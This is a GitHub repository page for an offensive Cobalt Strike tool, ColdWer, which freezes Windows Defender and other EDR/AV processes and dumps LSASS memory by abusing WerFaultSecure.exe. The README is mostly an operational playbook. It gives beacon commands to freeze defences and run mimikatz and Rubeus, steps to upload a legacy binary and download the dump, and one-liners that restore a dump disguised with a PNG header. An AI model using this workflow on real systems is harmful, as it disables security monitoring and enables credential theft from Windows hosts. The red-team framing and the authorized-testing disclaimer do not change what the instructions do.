Skip to content

0xsh3llf1r3/ColdWer

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

1 Commit
bin
bin
Β 
Β 
cw
cw
Β 
Β 
src
src
Β 
Β 
.gitignore
.gitignore
Β 
Β 
LICENSE
LICENSE
Β 
Β 
README.md
README.md
Β 
Β 

Repository files navigation

ColdWer
A cold war on your endpoint.

Stars Forks License

πŸ₯Ά ColdWer

ColdWer leverages WerFaultSecure.exe PPL bypass to freeze EDR/AV processes and dump LSASS memory on modern Windows systems.

C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

Freeze your EDR/AV. Extract what you need. Stay cold.

πŸ‘€ Author

Sh3llf1r3 (@0xsh3llf1r3)

πŸ™ Credits

This project builds upon research by TwoSevenOneT (@TwoSevenOneT):

Project Description
EDR-Freeze Original EDR freeze technique
WSASS LSASS dump via WerFaultSecure

All credit for the underlying techniques goes to TwoSevenOneT.

πŸ”₯ Features

Feature Description
❄️ Freeze Put EDR/AV processes into a coma state
πŸ”“ Dump Extract LSASS memory bypassing PPL
πŸ›‘οΈ PPL Bypass Leverage WerFaultSecure.exe at WinTcb level
⚑ Fast Inline BOF execution
🎯 Manual Control You decide when to freeze and unfreeze

πŸš€ Getting Started

πŸ“‹ Prerequisites

  • Cobalt Strike 4.x
  • High integrity beacon (Administrator/SYSTEM)

πŸ’Ύ Installation

  1. Clone the repository:
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. Load the aggressor script in Cobalt Strike:
  • Go to Cobalt Strike β†’ Script Manager
  • Click Load
  • Select cw/coldwer.cna

πŸ“¦ Building from Source

# Navigate to source directory
cd src/

# Compile BOF (requires MinGW)
make

# Or manually:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

πŸ“₯ Quick Download

  1. Go to Releases
  2. Download coldwer.o and coldwer.cna
  3. Place both in the same folder
  4. Load coldwer.cna in Cobalt Strike

πŸ–₯️ Usage

❄️ Freeze EDR/AV

# Find Windows Defender PID
beacon> ps

# Freeze the process
beacon> cw-freeze 1337

# Execute your commands while EDR/AV is frozen
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# Unfreeze when done
beacon> cw-unfreeze

πŸ”“ Dump LSASS

# Step 1: Upload Win8.1 WerFaultSecure.exe
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# Step 2: Find LSASS PID
beacon> ps

# Step 3: Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Step 4: Download the dump
beacon> download C:\Windows\Temp\lsass.dmp

πŸ”§ After Download

Change the file header to restore the minidump format:

Original (PNG) Change to (MDMP)
89 50 4E 47 4D 44 4D 50

Restore Header Commands:

Method Command
Python open('lsass.dmp','r+b').write(b'MDMP')
Bash printf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell $f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

Then parse with Mimikatz:

mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

πŸ“‹ Commands

Command Description
cw-freeze <PID> [Path] Freeze process
cw-unfreeze Unfreeze previously frozen process
cw-dump <PID> <Path> Dump LSASS memory

πŸ“ Examples

# Freeze with default path
beacon> cw-freeze 1337

# Use custom WerFaultSecure.exe
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Unfreeze when done
beacon> cw-unfreeze

βœ… Supported Targets

Target Status
Windows Defender (MsMpEng.exe) βœ… Works
LSASS (lsass.exe) βœ… Works
Other PPL processes βœ… Works

⚠️ Limitations

Does NOT work against EDRs with kernel-mode self-protection:

EDR Status
Elastic Endpoint ❌ Blocked
CrowdStrike Falcon ❌ Blocked
SentinelOne ❌ Blocked
Carbon Black ❌ Blocked

βš™οΈ How It Works

1. πŸš€ Launch WerFaultSecure.exe as PPL (WinTcb level)
                    ↓
2. 🎯 WerFaultSecure attaches to target process
                    ↓
3. ⏸️  MiniDumpWriteDump suspends all target threads
                    ↓
4. πŸ₯Ά Suspend WerFaultSecure itself β†’ Target stays frozen
                    ↓
5. βœ… Execute your commands (EDR/AV can't see!)
                    ↓
6. πŸ”₯ Terminate WerFaultSecure β†’ Target unfreezes

πŸ”‘ Why Win8.1 WerFaultSecure?

Version Output
Windows 10/11 Encrypted dump only
Windows 8.1 Raw unencrypted dump

πŸ” Troubleshooting

Error Cause Solution
File not found Invalid path Check WerFaultSecure.exe path
Access denied Low privileges Run as Administrator/SYSTEM
Invalid signature Unsigned binary Use properly signed WerFaultSecure.exe
Process does not exist Wrong PID Verify PID with ps command
Target protected Kernel protection EDR has self-protection (not bypassable)
Already frozen State stuck Run cw-unfreeze first

βš–οΈ Disclaimer

⚠️ FOR AUTHORIZED SECURITY TESTING ONLY

This tool is intended for:
- Authorized penetration testing
- Red team operations with written permission
- Security research in controlled environments

The author is not responsible for any misuse or damage caused by this tool.
Unauthorized access to computer systems is illegal.

πŸ“œ License

MIT License - See LICENSE

πŸ₯Ά Stay Cold. Stay Quiet. πŸ₯Ά

⭐ Star this repo if you find it useful! ⭐

About

Cobalt Strike BOF to freeze EDR/AV processes and dump LSASS using WerFaultSecure.exe PPL bypass

Topics

offensive-security cobalt-strike red-team bof av-bypass windows-security credential-dumping edr-bypass edr-evasion beacon-object-file lsass-dump edr-freeze ppl-bypass

Resources

Readme

License

MIT license
Activity

Stars

118 stars

Watchers

0 watching

Forks

21 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages